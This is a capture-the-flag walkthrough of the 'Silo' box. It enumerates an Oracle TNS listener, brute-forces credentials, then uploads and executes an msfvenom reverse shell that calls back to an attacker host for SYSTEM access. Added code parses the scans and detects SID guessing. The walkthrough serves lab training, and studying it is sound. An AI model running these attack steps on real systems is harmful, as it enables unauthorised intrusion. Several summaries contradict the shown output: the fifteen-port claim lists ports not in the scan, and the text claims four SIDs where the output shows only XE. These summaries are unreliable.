# Silo

**Reconnaissance:**

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.82

80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE

135/tcp   open  msrpc        Microsoft Windows RPC

139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)

49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC

49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)

49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/16%OT=80%CT=1%CU=35875%PV=Y%DS=2%DC=I%G=Y%TM=657
OS:E5D23%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S
OS:%TS=7)SEQ(SP=104%GCD=2%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=105%GCD=1
OS:%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M
OS:53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=200
OS:0%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-time: 
|   date: 2023-12-17T02:29:46
|_  start_date: 2023-12-17T02:23:51
|_clock-skew: mean: -2s, deviation: 0s, median: -3s

```

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.82   

PORT      STATE         SERVICE
123/udp   open|filtered ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
500/udp   open|filtered isakmp
4500/udp  open|filtered nat-t-ike
5355/udp  open|filtered llmnr
20003/udp open|filtered commtact-https
40805/udp open|filtered unknown
```

We have fifteen open ports.

* Port 80: running Microsoft-IIS/8.5
* Ports 135, 49152, 49153, 49154, 49155, 49158, 49161 & 49162: running Microsoft Windows RPC
* Ports 139 & 445: running Samba
* Ports 1521 & 4196: running Oracle TNS listener
* Ports 5985 & 47001: running Microsoft HTTP API httpd 2.0
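
To recount the scan results by service, here is an added example (not part of the original writeup) that parses nmap's normal-output port lines into records. The input is copied from the TCP and UDP scans above; the parser treats only a state of exactly `open` as confirmed, so the UDP `open|filtered` entries are reported separately.

```python
import re
from collections import defaultdict

# Port lines copied from the page's two nmap scans (TCP first, then UDP).
NMAP_OUTPUT = """\
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
123/udp   open|filtered ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
500/udp   open|filtered isakmp
4500/udp  open|filtered nat-t-ike
5355/udp  open|filtered llmnr
20003/udp open|filtered commtact-https
40805/udp open|filtered unknown
"""

# nmap normal output: "<port>/<proto>  <state>  <service>  [version banner]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[\w|]+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_ports(text):
    """Return one dict per port line; lines that are not port lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        rec["version"] = (rec["version"] or "").strip()
        records.append(rec)
    return records


def confirmed_open(records, proto="tcp"):
    """Ports whose state is exactly 'open' (UDP open|filtered is not confirmed)."""
    return sorted(r["port"] for r in records if r["proto"] == proto and r["state"] == "open")


def unconfirmed(records, proto="udp"):
    """Ports nmap could not confirm (open|filtered), typically from a UDP scan."""
    return sorted(r["port"] for r in records if r["proto"] == proto and "|" in r["state"])


def by_service(records, proto="tcp"):
    """Group confirmed-open ports by the service name nmap assigned."""
    grouped = defaultdict(list)
    for r in records:
        if r["proto"] == proto and r["state"] == "open":
            grouped[r["service"]].append(r["port"])
    return {svc: sorted(ports) for svc, ports in grouped.items()}


if __name__ == "__main__":
    recs = parse_ports(NMAP_OUTPUT)
    print("confirmed open TCP:", confirmed_open(recs))
    print("unconfirmed UDP:", unconfirmed(recs))
    for svc, ports in by_service(recs).items():
        print(f"{svc:14s} {ports}")
```

Running it against the scan above lists 12 confirmed-open TCP ports (seven `msrpc`, two `oracle-tns`, and one each of `http`, `netbios-ssn` and `microsoft-ds`); the eight UDP entries stay unconfirmed until probed further.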

Port 80 is running a Microsoft IIS server. A quick Google search tells us that IIS 8.5 ships with Windows Server 2012 R2, so that is probably the OS. The gobuster scan didn't really find anything useful for this web server.

```
┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.82  

+ Server: Microsoft-IIS/8.5
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /FvdPFBj4.ashx: Retrieved x-aspnet-version header: 4.0.30319.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
```

```
┌──(kali💀kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.82/

/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
```

**Enumeration:**

```
┌──(kali💀kali)-[~]
└─$ searchsploit Oracle TNS listener

Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Met | windows/remote/16342.rb
Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote De | multiple/dos/21782.txt
Oracle 8i - TNS Listener 'ARGUMENTS' Remote Buffer Overflow ( | windows/remote/16340.rb
Oracle 8i - TNS Listener Buffer Overflow                      | windows/remote/20980.c
Oracle 8i - TNS Listener Local Command Parameter Buffer Overf | linux/local/21362.c
Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasp | windows/remote/16341.rb
Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC)           | windows/dos/8507.py
```

If you don't have ODAT installed on Kali, the installation instructions can be found here:

{% embed url="https://github.com/quentinhardy/odat#installation-optional-for-development-version" %}

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more#rce-java-store-procedure" %}

The first thing we need to enumerate is the Oracle System ID (SID). This is a string that uniquely identifies a particular database instance on a host, and the listener will only route a connection if the client names a SID (or service name) it knows. This can be done using the sidguesser module in ODAT.

```
┌──(kali💀kali)-[~]
└─$ sudo odat sidguesser -s 10.10.10.82 -p1521

[1] (10.10.10.82:1521): Searching valid SIDs                                                    
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                 ######################### | ETA:  00:00:03 
100% |#########################################################################| Time: 00:06:24 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#########################################################################| Time: 00:00:12 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...                 ##################        | ETA:  00:00:37 
100% |#########################################################################| Time: 00:05:46 
[+] SIDs found on the 10.10.10.82:1521 server: XE
```

This takes a while (the wordlist pass alone ran for over six minutes), but it does find 4 valid SID strings:

```
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB,SA,SB
```
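
From the listener's side, the sidguesser run above is a burst of connection attempts from one host, each naming a different SID and each rejected. The following is an added detection example, not part of the original writeup or of ODAT: it parses constructed `listener.log` entries (the layout is assumed to follow Oracle's classic text log format, with the listener return code as the last field, where `0` is a routed connection and `12505` is "listener does not currently know of SID") and flags any source that fails against several distinct SIDs inside a short window, then records whether that source later connected successfully.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta


def _entry(ts, sid, src, port, rc):
    # Builds one constructed listener.log line in the classic text layout (assumed format).
    return (f"{ts} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) "
            f"* (ADDRESS=(PROTOCOL=tcp)(HOST={src})(PORT={port})) * establish * {sid} * {rc}")


# Constructed sample: one host cycles through guessed SIDs and finally hits XE,
# while a second host makes a single typo and then connects normally.
LISTENER_LOG = "\n".join([
    _entry("17-DEC-2023 02:25:01", "ORCL", "10.10.14.3", 41230, 12505),
    _entry("17-DEC-2023 02:25:01", "TEST", "10.10.14.3", 41231, 12505),
    _entry("17-DEC-2023 02:25:02", "PROD", "10.10.14.3", 41232, 12505),
    _entry("17-DEC-2023 02:25:02", "DEV", "10.10.14.3", 41233, 12505),
    _entry("17-DEC-2023 02:25:03", "XEE", "10.10.10.5", 50011, 12505),
    _entry("17-DEC-2023 02:25:03", "DB1", "10.10.14.3", 41234, 12505),
    _entry("17-DEC-2023 02:25:04", "ORA", "10.10.14.3", 41235, 12505),
    _entry("17-DEC-2023 02:25:09", "XE", "10.10.10.5", 50012, 0),
    _entry("17-DEC-2023 02:25:12", "XE", "10.10.14.3", 41236, 0),
])

LINE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=(?P<sid>[^)]*)\).*? \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\)"
    r" \* establish \* [^*]+ \* (?P<rc>\d+)$"
)


def parse_listener_log(text):
    """Turn each 'establish' line into {ts, sid, src, rc}; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S"),
            "sid": m["sid"],
            "src": m["src"],
            "rc": int(m["rc"]),
        })
    return events


def detect_sid_guessing(text, window=timedelta(seconds=60), threshold=5):
    """Alert on a source that is rejected for >= threshold distinct SIDs within `window`.

    Events are assumed to be in chronological order, as they are in the log file.
    A later successful connect from an alerted source is recorded under 'succeeded'.
    """
    alerts = {}                  # src -> alert dict
    recent = defaultdict(deque)  # src -> (ts, sid) rejections still inside the window
    for ev in parse_listener_log(text):
        src, q = ev["src"], recent[ev["src"]]
        if ev["rc"] == 0:
            if src in alerts:
                alerts[src]["succeeded"].append(ev["sid"])
            continue
        q.append((ev["ts"], ev["sid"]))
        while ev["ts"] - q[0][0] > window:  # drop rejections older than the window
            q.popleft()
        distinct = {sid for _, sid in q}
        if len(distinct) >= threshold:
            a = alerts.setdefault(src, {
                "src": src, "first_failure": q[0][0], "distinct_sids": 0, "succeeded": [],
            })
            a["distinct_sids"] = max(a["distinct_sids"], len(distinct))
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_sid_guessing(LISTENER_LOG):
        print(alert)
```

The threshold is deliberately on distinct SIDs rather than raw rejections, so a misconfigured client that retries one wrong SID all day does not trip it, while a guesser that walks a wordlist does. A real deployment would read the log incrementally and would also key on the `TNS-12514` code that the listener returns for unknown service names.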

We discovered a SID called ‘XE’. Now let's try finding valid credentials on this server:

```
┌──(kali💀kali)-[~]
└─$ sudo odat passwordguesser  -s 10.10.10.82 -p1521 -d XE

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521           
The login cis has already been tested at least once. What do you want to do:   | ETA:  00:19:52 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA:  00:22:51 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA:  00:21:55 
[!] Notice: 'dip' account is locked, so skipping this username for password    | ETA:  00:20:38 
[!] Notice: 'hr' account is locked, so skipping this username for password     | ETA:  00:16:36 
[!] Notice: 'mdsys' account is locked, so skipping this username for password  | ETA:  00:12:38 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for passwordTA:  00:09:48 
[!] Notice: 'outln' account is locked, so skipping this username for password  | ETA:  00:08:48 
[+] Valid credentials found: scott/tiger. Continue... ##########               | ETA:  00:04:50 
[!] Notice: 'xdb' account is locked, so skipping this username for password#   | ETA:  00:00:57 
100% |#########################################################################| Time: 00:24:01 
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger                                                                                     
```

Now we have valid credentials: user ‘scott’ and password ‘tiger’ for the SID ‘XE’. We can use them to upload a reverse shell and execute it.

To do that, first we need to prepare our EXE reverse shell using msfvenom:

```
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell.exe
```

Now upload the reverse shell:

```
┌──(kali💀kali)-[~]
└─$ sudo odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp tonee.exe  /home/kali/Desktop/shell.exe
```

Start the NC listener on the port that we used with MSFvenom:

```
┌──(kali💀kali)-[~]
└─$ nc -nvlp 4444
```

Finally, execute the shell:

```
┌──(kali💀kali)-[~]
└─$ sudo odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp tonee.exe
```

Go back to your NC listener:

We are NT Authority\System.
